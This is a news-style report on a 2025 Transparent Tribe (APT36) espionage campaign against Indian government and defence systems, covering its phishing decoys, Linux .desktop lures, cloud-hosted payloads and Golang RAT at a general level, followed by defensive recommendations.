Pakistan hacker group ‘Transparent Tribe’ attack Indian government systems

Indian cybersecurity teams and private researchers have uncovered a fresh cyber-espionage campaign by the Pakistan-linked APT group known as Transparent Tribe (also tracked as APT36) targeting Indian government and defence systems. The campaign — active through 2025 — uses sophisticated phishing lures, cross-platform malware and novel delivery techniques that aim to gain long-term access to sensitive networks.

Timeline & scope

Researchers first flagged the latest wave in mid-2025 and published detailed writeups through August–October. Multiple security vendors say the attacks focused on Indian defence, administrative and education sector targets and used decoy documents themed around real-world incidents to trick government employees into opening malicious files.

How the attackers operate

This campaign shows Transparent Tribe evolving its toolkit:

• Phishing with realistic decoys: Targeted spear-phishing emails carried weaponized attachments that looked like legitimate PDFs or government notices. The decoys used current events and official formats to increase credibility.
• Cross-platform payloads: Attackers delivered payloads for both Windows and India’s BOSS (Bharat Operating System Solutions) Linux environment by packaging malicious .desktop files and shortcuts that, when clicked, fetched malware from cloud storage (notably Google Drive).
• New RAT family & Golang builds: Analysts observed a Golang-based DeskRAT / DeskSpy variant used for persistence, remote control and data exfiltration — a sign the group is adopting cross-platform languages to outflank defensive tools.

Why this campaign is notable

Transparent Tribe has a long history of targeting Indian government and military users, but current activity shows marked escalation in technique and reach:

1. Linux targeting at scale: Targeting BOSS Linux is significant because many Indian government appliances and endpoints run locally developed or hardened Linux stacks — it expands the attacker’s footprint beyond Windows-only compromises.
2. Cloud payload hosting: Delivering payloads via popular cloud platforms complicates detection and takedown, and leverages legitimate services to evade filters.
3. Operational patience: Indicators point to long-term espionage goals — establishing persistence, lateral movement, and steady exfiltration rather than disruptive attacks.

What Indian authorities and agencies are doing

Public reports indicate national cybersecurity bodies and select private CERTs have been alerted and are coordinating containment and forensic measures. The Ministry of Home Affairs and defence cyber units routinely collaborate with CERT-In and industry partners to push indicators of compromise (IOCs) and mitigation guidance to government departments. Media briefings and specialist advisories have emphasised tightening email security, applying endpoint detection rules, and blocking the identified command-and-control domains.

Signs of compromise (high-priority IOCs)

Security vendors publishing technical reports have listed IOCs and tactics to watch for (examples drawn from vendor advisories):

• Phishing emails with attachments named to mimic official notifications or incident reports.
• .desktop shortcut files or seemingly benign files that execute scripts to download payloads from Google Drive or other cloud hosts.
• Outbound traffic to suspicious WebSocket/C2 domains and unexpected Golang-built processes.

Practical steps for defenders

For IT teams in government and critical infrastructure, recommended immediate actions include:

• Enforce strict email attachment policies; block .desktop and unknown executable attachments at the gateway.
• Deploy or tune endpoint detection to flag uncommon processes (Golang binaries) and unexpected persistence mechanisms.
• Ensure patching, multi-factor authentication, and least-privilege for sensitive systems; rotate credentials if intrusion is suspected.
• Share IOCs across agencies and use threat-intelligence feeds to update firewalls and proxy rules.

Wider implications

This campaign underlines a larger trend: state-aligned APT groups are increasingly building cross-platform tools, abusing cloud hosting services, and tailoring lures to local languages and events. For India, the rising tempo of such espionage efforts reinforces the need for better cyber-hygiene at the departmental level, improved public-sector incident response capabilities, and stronger collaboration with private security researchers.

Bottom line

The Transparent Tribe attack against Indian government systems is a reminder that cyber-espionage remains a persistent, adaptive threat. Organisations must assume targeted phishing will continue and that attackers will keep innovating — defenders need rapid threat intelligence sharing, hardened endpoints, and user awareness to reduce risk.